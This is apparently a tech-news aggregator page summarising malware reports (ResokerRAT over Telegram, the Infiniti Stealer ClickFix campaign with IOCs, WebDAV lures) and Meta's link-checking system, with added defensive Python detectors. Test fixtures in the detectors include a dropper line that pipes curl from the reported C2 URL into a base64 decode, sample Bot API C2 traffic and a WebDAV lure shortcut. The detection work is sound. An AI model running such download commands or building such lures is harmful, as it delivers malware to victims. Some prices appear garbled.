URL

Winsage
April 6, 2026
A newly documented Windows remote access trojan, ResokerRAT, uses Telegram's Bot API as its command-and-control channel, so its operator can monitor and control infected machines without running a conventional C2 server, and the malware's traffic blends into ordinary Telegram traffic to api.telegram.org, which complicates detection. On execution it creates a mutex so that only one instance runs, checks for an attached debugger to frustrate analysis, tries to relaunch itself with elevated privileges, and reports any failure to the operator. It terminates known monitoring tools and installs a global keyboard hook to block defensive key combinations. The operator drives it with text commands sent through Telegram: listing processes, taking screenshots, and changing system settings to evade detection. Persistence comes from a startup entry combined with changes to UAC settings. It can fetch additional payloads from operator-supplied URLs and sends its data URL-encoded. Researchers have confirmed the Telegram traffic in the wild and mapped the behaviour to several MITRE ATT&CK techniques. Security teams are advised to look for Telegram Bot API traffic from processes that have no reason to generate it, and to review the registry keys that control startup entries and UAC.
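As an added example (not code from the report or from the malware analysis), the following Python scans proxy log lines for Telegram Bot API calls made by processes that are not on an allow-list of known bots, and decodes the URL-encoded text of any sendMessage call so an analyst can read what the implant reported. The host api.telegram.org and the /bot<token>/<method> URL shape are public properties of the Bot API; the log format, the sample lines and the empty allow-list are assumptions made for the demonstration.

```python
"""Added example: flag Telegram Bot API use by processes that should not be bots.

The Bot API host (api.telegram.org) and URL shape (/bot<token>/<method>) are
public Telegram facts; the log format and process allow-list are assumptions.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

TELEGRAM_BOT_API_HOST = "api.telegram.org"
# Bot API calls look like https://api.telegram.org/bot<id>:<secret>/<method>
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)$")
# Processes on this fleet that legitimately run Telegram bots (assumption: none).
ALLOWED_BOT_PROCESSES: set[str] = set()

# Constructed proxy log: "<timestamp> <host> <process> <verb> <url>" per line.
SAMPLE_LOG = """\
2026-04-06T09:12:01Z ws-0142 chrome.exe GET https://telegram.org/
2026-04-06T09:12:05Z ws-0142 svchost.exe GET https://api.telegram.org/bot123456789:AAF0kLxQz9T2mYwVb3Nc8HdRfGp1JsKuEeW/getUpdates?offset=41&timeout=30
2026-04-06T09:12:09Z ws-0142 svchost.exe GET https://api.telegram.org/bot123456789:AAF0kLxQz9T2mYwVb3Nc8HdRfGp1JsKuEeW/sendMessage?chat_id=987654&text=elevation%20failed%3A%20UAC%20denied
2026-04-06T09:12:30Z ws-0142 telegram.exe POST https://149.154.167.50/api
"""


@dataclass(frozen=True)
class Alert:
    line_no: int
    process: str
    method: str
    bot_id: str      # public half of the token; useful for pivoting across hosts
    message: str     # decoded 'text' parameter when the call was sendMessage


def decoded_text(query: str) -> str:
    """Return the URL-decoded 'text' parameter of a sendMessage call."""
    return parse_qs(query).get("text", [""])[0]


def scan(log_text: str) -> list[Alert]:
    """Return one Alert per Bot API call from a process outside the allow-list."""
    alerts = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        _ts, _host, process, _verb, url = line.split(" ", 4)
        parts = urlsplit(url)
        if (parts.hostname or "").lower() != TELEGRAM_BOT_API_HOST:
            continue
        match = BOT_PATH_RE.match(parts.path)
        if match is None or process.lower() in ALLOWED_BOT_PROCESSES:
            continue
        message = decoded_text(parts.query) if match["method"] == "sendMessage" else ""
        alerts.append(Alert(line_no, process, match["method"],
                            match["token"].split(":")[0], message))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.process} -> {a.method} (bot {a.bot_id}) {a.message}")
```

The Bot API is designed for server-side bots; the Telegram Desktop client speaks MTProto to Telegram's own servers rather than calling api.telegram.org, so on an end-user workstation any /bot<token>/ request deserves a look. The getUpdates polling seen on the second line is how a bot receives commands without a listening server, and the bot id recovered from the token is a stable pivot for finding other infected hosts that report to the same operator.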
Tech Optimizer
March 30, 2026
Security researchers have identified a new macOS information stealer, Infiniti Stealer, delivered through the ClickFix social-engineering technique: a counterfeit Cloudflare human-verification page instructs the visitor to paste a command into the Mac Terminal, so the victim launches the malware themselves, with their own privileges, and sidesteps the warnings that a downloaded application would trigger. The infection proceeds in three stages:

1. A Bash dropper script downloads and decodes a hidden payload.
2. A Nuitka-built loader for Apple Silicon Macs, which compiles the Python source into a native binary and thereby complicates analysis and detection.
3. The final payload, Infiniti Stealer, harvests browser passwords, macOS Keychain entries and cryptocurrency wallets, and captures screenshots.

Indicators of compromise (IOCs) associated with Infiniti Stealer:

- MD5 (dropper): da73e42d1f9746065f061a6e85e28f0c
- SHA256 (stage 3): 1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958
- C2 domain: update-check[.]com
- C2 URL: https://update-check[.]com/m/7d8df27d95d9
- Panel: Infiniti-stealer[.]com
- Packer magic: 4b 41 59 28 b5 2f fd ("KAY" followed by the zstd frame magic)
- Debug log: /tmp/.bs_debug.log
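An added example, not part of the report, that matches a file against the indicators listed above. It shows the difference between the indicator types: the packer magic matches any sample packed the same way, while the hash indicators only match the exact files that were analysed, so a repacked dropper is caught by the magic check and missed by the hashes. The IOC values are copied from the list above; the sample blobs are constructed for the demonstration and are not malware.

```python
"""Added example: match a file against the published Infiniti Stealer IOCs.

The IOC values are the ones listed above; the sample files below are
constructed for the demonstration and are not real malware.
"""
import hashlib

# "KAY" followed by the zstd frame magic (28 b5 2f fd, i.e. 0xFD2FB528 little-endian).
PACKER_MAGIC = bytes.fromhex("4b 41 59 28 b5 2f fd")
STAGE3_SHA256 = "1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958"
DROPPER_MD5 = "da73e42d1f9746065f061a6e85e28f0c"
# Network and host IOCs as published, in defanged form.
STRING_IOCS = [
    "update-check[.]com",
    "Infiniti-stealer[.]com",
    "/tmp/.bs_debug.log",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its literal form ('[.]' -> '.')."""
    return ioc.replace("[.]", ".")


def match_file(data: bytes) -> list[str]:
    """Return the IOC types the blob matches, in a fixed order (empty if clean)."""
    hits = []
    if data.startswith(PACKER_MAGIC):
        hits.append("packer-magic")
    if hashlib.sha256(data).hexdigest() == STAGE3_SHA256:
        hits.append("sha256-stage3")
    if hashlib.md5(data).hexdigest() == DROPPER_MD5:
        hits.append("md5-dropper")
    # latin-1 maps every byte to a character, so binary blobs decode without error.
    text = data.decode("latin-1").lower()
    for ioc in STRING_IOCS:
        if refang(ioc).lower() in text:
            hits.append("string:" + ioc)
    return hits


# Constructed samples (not real malware):
PACKED_BLOB = PACKER_MAGIC + b"\x00" * 32          # a blob carrying the KAY+zstd header
DROPPER_SCRIPT = (                                  # a dropper-like shell script
    b"#!/bin/bash\n"
    b"exec >/tmp/.bs_debug.log 2>&1\n"
    b"curl -fsSL https://update-check.com/m/7d8df27d95d9 | base64 -d > /tmp/.p\n"
)
BENIGN_FILE = b"#!/bin/bash\necho hello\n"

if __name__ == "__main__":
    for name, blob in [("packed", PACKED_BLOB), ("dropper", DROPPER_SCRIPT), ("benign", BENIGN_FILE)]:
        print(name, match_file(blob) or "clean")
```

The constructed dropper trips the string indicators but not the MD5, which is the expected behaviour: a single changed byte in a re-served script produces a new hash, so hash IOCs confirm an exact sample while the magic bytes and the C2 strings generalise to related builds.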
AppWizard
March 26, 2026
Stream Cinema is a media center application that enables users to stream Video on Demand content and supports various Stremio Addons. It can be installed on devices like the Onn 4K Pro, NVIDIA SHIELD, and Google TV Streamer, but currently does not have an APK for Firestick or Fire TV. The free version offers robust features, while the Premium version costs .99 per year or .99 for a lifetime subscription, providing additional benefits like favorites management and trailer access. The installation process involves downloading the app from the Google Play Store, enabling external sources, and configuring third-party addons. Users can connect to TorrentsDB for streaming links and are advised to use a VPN for privacy. The app features a modern user interface, quick playback, and limited settings. While its legality is uncertain, its presence on Google Play suggests some vetting.
Tech Optimizer
March 12, 2026
Antivirus companies often offer free protection to build brand awareness, but many restrict their free versions to non-commercial use. Examples include Avast One Basic, AVG AntiVirus Free, Avira Free Security, and Panda Free Antivirus. Free antivirus software typically comes with limited tech support, with direct assistance reserved for paying customers. Key features may be missing in free versions, such as the ability to redirect users from dangerous websites or real-time protection. Microsoft Defender Antivirus is a built-in option that activates when no other antivirus is present but can be cumbersome and has limited protection against malicious URLs outside the Edge browser. Avast One Basic and AVG AntiVirus Free are recognized as top free options, but leading commercial products like Norton AntiVirus Plus and Bitdefender Antivirus Plus consistently outperform them. Both Norton and Bitdefender offer enhanced features beyond basic antivirus capabilities. While free antivirus can be effective, paid solutions provide greater protection and peace of mind.
AppWizard
March 11, 2026
Advanced Browsing Protection (ABP) in Messenger warns users about potentially harmful links shared in end-to-end encrypted conversations without revealing those links to Meta. It combines on-device models with a dynamic watchlist of millions of potentially malicious sites, and relies on cryptographic techniques so that the server learns as little as possible about what a client looked up. The core primitive is private information retrieval (PIR), which lets a client fetch a record from the server's database while minimising what the server learns from the query; the design also uses oblivious pseudorandom functions (OPRFs) and a privacy-preserving URL-matching scheme. The server groups watchlist entries by domain, so a client retrieves a single bucket covering the domain-specific path components it needs, and it computes a ruleset that balances bucket sizes. Client queries are processed inside a confidential virtual machine (CVM) built on AMD SEV-SNP, which handles the hash prefixes in encrypted memory and produces attestation reports that the client can verify before trusting the service. Oblivious RAM hides the server's memory access patterns, and Oblivious HTTP (OHTTP) routes requests through a relay that strips identifying information such as the client's network address. An ABP request therefore has a pre-processing phase, in which the server refreshes the URL database and recomputes the rulesets, followed by the client phase: compute the bucket identifier for the link, send the encrypted request through the proxy, and check the response locally to decide whether the URL is unsafe.
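As an added illustration written for this page (not Meta's code), the following Python models only the domain-bucketing step described above: the server groups watchlist entries by domain, the client asks for the bucket selected by a short hash prefix of the domain, and matching against hashed domain-plus-path keys happens on the client. It makes visible what a plain bucketed lookup still leaks (the prefix, recorded in `requests_seen`), which is exactly what the PIR, OPRF, ORAM, OHTTP and SEV-SNP layers of the real design are there to hide; none of those layers is modelled. The prefix length, the key derivation and the watchlist contents are assumptions.

```python
"""Added example: the domain-bucketing step of a privacy-preserving URL check.

Illustration for this page, not Meta's implementation. Only bucketing is
modelled; the PIR/OPRF/ORAM/OHTTP/SEV-SNP layers that hide even the bucket
prefix from the server are deliberately left out.
"""
import hashlib
from collections import defaultdict
from urllib.parse import urlsplit

PREFIX_BITS = 8  # assumption: 256 buckets; a real deployment tunes this


def sha256(s: str) -> bytes:
    return hashlib.sha256(s.encode("utf-8")).digest()


def bucket_id(domain: str) -> int:
    """Bucket = first PREFIX_BITS bits of H(domain); in this model that is all the server sees."""
    return int.from_bytes(sha256(domain.lower())[:2], "big") >> (16 - PREFIX_BITS)


def url_keys(url: str) -> list[str]:
    """Domain followed by every path prefix, so a listed parent path also matches."""
    parts = urlsplit(url)
    domain = (parts.hostname or "").lower()
    keys = [domain]
    path = ""
    for seg in [s for s in parts.path.split("/") if s]:
        path += "/" + seg
        keys.append(domain + path)
    return keys


class WatchlistServer:
    """Groups unsafe URLs into buckets by domain prefix and serves whole buckets."""

    def __init__(self, unsafe_urls):
        self.buckets: dict[int, set[bytes]] = defaultdict(set)
        for url in unsafe_urls:
            keys = url_keys(url)
            # Store H(domain + path) rather than plaintext so the bucket is not a readable list.
            self.buckets[bucket_id(keys[0])].add(sha256(keys[-1]))
        self.requests_seen: list[int] = []  # what this server learns per query

    def fetch_bucket(self, bid: int) -> set[bytes]:
        self.requests_seen.append(bid)
        return set(self.buckets.get(bid, ()))


def client_is_unsafe(server: WatchlistServer, url: str) -> bool:
    """Client side: fetch the bucket for the domain prefix, then match locally."""
    keys = url_keys(url)
    bucket = server.fetch_bucket(bucket_id(keys[0]))
    return any(sha256(k) in bucket for k in keys)


# Constructed watchlist for the demonstration.
WATCHLIST = ["https://malicious.example/login", "https://phish.example/"]

if __name__ == "__main__":
    srv = WatchlistServer(WATCHLIST)
    for u in ["https://malicious.example/login/steal.php", "https://malicious.example/about",
              "https://phish.example/anything", "https://safe.example/"]:
        print(u, "UNSAFE" if client_is_unsafe(srv, u) else "ok")
    print("server saw bucket ids:", srv.requests_seen)
```

Two points the model makes concrete: the server never receives the URL, only a bucket prefix, yet a prefix over a small set of candidate domains is still informative, and an unsalted hash of a domain can be brute-forced offline. Those gaps are why the production design replaces the plain hash with an OPRF and the plain bucket fetch with PIR inside an attested CVM.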
AppWizard
March 11, 2026
Meta has introduced Advanced Browsing Protection (ABP) in its Messenger application to improve user safety by identifying harmful websites shared in chats. ABP relies on a constantly updated watchlist of potentially harmful websites and improves on the existing Safe Browsing feature. Because Messenger chats are end-to-end encrypted, Meta cannot see message content or the links in it, so ABP uses cryptography and secure-computing techniques to check a link without exposing it. When a user taps a link, Messenger checks it against the blocklist using a privacy-preserving query. Users can turn ABP on or off in the Messenger app under Settings > Privacy & safety > Safe browsing; if the option is not visible, the app may need to be updated.
Winsage
March 3, 2026
The Files app has been updated to version 4.0.28, featuring an improved right-click context menu, bug fixes, support for the Microsoft Store version of Dropbox, icon customization for URL and shortcut files, and an option to disable smooth scrolling. The update resolves several issues, including problems with the 'Open With' menu, tab switching, and tag searches. The development team is focused on performance improvements, particularly for thumbnail loading times. Microsoft has plans to enhance Windows 11 and address user pain points related to File Explorer.
Winsage
March 1, 2026
Cybercriminals are abusing a legacy feature of Windows File Explorer, its WebDAV client, to deliver malware while bypassing browser-based security controls. Microsoft deprecated the native WebDAV client (the WebClient service) in November 2023, but it remains present and active on many systems. Attackers send links that make File Explorer connect directly to a remote WebDAV server, so the victim never passes through a web browser or sees its download warnings; the lures use direct links, URL shortcut (.url) files and LNK shortcut files to deliver the payload. The campaigns, which surged in late 2024, mainly deploy remote access trojans: 87% of the Active Threat Reports involved multiple RATs, including XWorm RAT, AsyncRAT and DcRAT. Targets are predominantly corporate networks in Europe, and many of the phishing emails are written in German and English. The WebDAV servers are short-lived and hosted behind Cloudflare Tunnel demo accounts, which obscures the attackers' infrastructure. Security analysts are advised to monitor for unusual network activity originating from File Explorer and the WebClient service, and to teach users to check the address File Explorer shows before opening anything from it.
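As an added example (not code from the report), the following Python parses a Windows URL shortcut (.url) file and flags targets that would make File Explorer open a WebDAV share rather than a normal web page. The `\\host@SSL@port\DavWWWRoot\...` and `file://host@SSL/...` forms are the documented Windows WebDAV UNC syntax; the `.trycloudflare.com` suffix is the public Cloudflare quick-tunnel domain, which this page does not name; the IconFile check, the list of risky extensions and the sample shortcuts are assumptions made for the demonstration.

```python
"""Added example: flag URL shortcut (.url) files whose target is a WebDAV share.

\\host[@SSL][@port]\path is the documented Windows WebDAV UNC syntax; the
trycloudflare.com suffix is Cloudflare's quick-tunnel domain (assumption:
relevant here because the page reports Cloudflare Tunnel demo hosting).
The sample shortcuts are constructed.
"""
import re
from configparser import ConfigParser

# \\host[@SSL][@port]\path  or  file://host[@SSL][@port]/path
WEBDAV_TARGET_RE = re.compile(
    r"^(?:\\\\|file://)(?P<host>[A-Za-z0-9.\-]+)(?P<ssl>@SSL)?(?:@(?P<port>\d+))?(?P<path>[\\/].*)?$",
    re.IGNORECASE,
)
QUICK_TUNNEL_SUFFIX = ".trycloudflare.com"
RISKY_EXTENSIONS = (".exe", ".lnk", ".js", ".vbs", ".hta", ".scr", ".bat", ".cmd", ".ps1", ".msi")


def parse_url_file(text: str) -> dict[str, str]:
    """Return the URL and IconFile targets of an [InternetShortcut] file (keys lower-cased)."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    section = cp["InternetShortcut"] if cp.has_section("InternetShortcut") else {}
    return {key: section[key] for key in ("url", "iconfile") if key in section}


def classify_target(target: str) -> list[str]:
    """Reasons a shortcut target looks like a WebDAV lure (empty list = nothing notable)."""
    reasons = []
    m = WEBDAV_TARGET_RE.match(target.strip())
    if m is None:
        return reasons  # ordinary http(s) links open in a browser, not via the WebDAV redirector
    host = m["host"].lower()
    path = (m["path"] or "").replace("\\", "/").lower()
    if m["ssl"] or m["port"]:
        reasons.append("webdav-ssl-or-port")      # @SSL/@port only exists in WebDAV UNC paths
    if "/davwwwroot/" in path + "/":
        reasons.append("davwwwroot")              # forces the WebDAV redirector
    if host.endswith(QUICK_TUNNEL_SUFFIX):
        reasons.append("quick-tunnel-host")       # disposable Cloudflare quick-tunnel hostname
    if path.endswith(RISKY_EXTENSIONS):
        reasons.append("executable-target")
    return reasons


def classify_url_file(text: str) -> dict[str, list[str]]:
    """Classify every remote target in the shortcut, both URL= and IconFile=."""
    return {key: classify_target(value) for key, value in parse_url_file(text).items()}


# Constructed samples. Backslashes are doubled because this is a normal Python string.
LURE = """\
[InternetShortcut]
URL=file://abc-def-ghi.trycloudflare.com@SSL/DavWWWRoot/Rechnung_2026.lnk
IconFile=\\\\abc-def-ghi.trycloudflare.com@SSL\\DavWWWRoot\\icon.ico
IconIndex=0
"""
BENIGN = """\
[InternetShortcut]
URL=https://www.microsoft.com/
"""

if __name__ == "__main__":
    print("lure:", classify_url_file(LURE))
    print("benign:", classify_url_file(BENIGN))
```

The IconFile key is checked as well as URL because Explorer resolves the icon path when it merely renders the shortcut, before the user double-clicks it. LNK files carry the same kind of target in a binary format and would need a dedicated parser; the classification of the extracted target is the same.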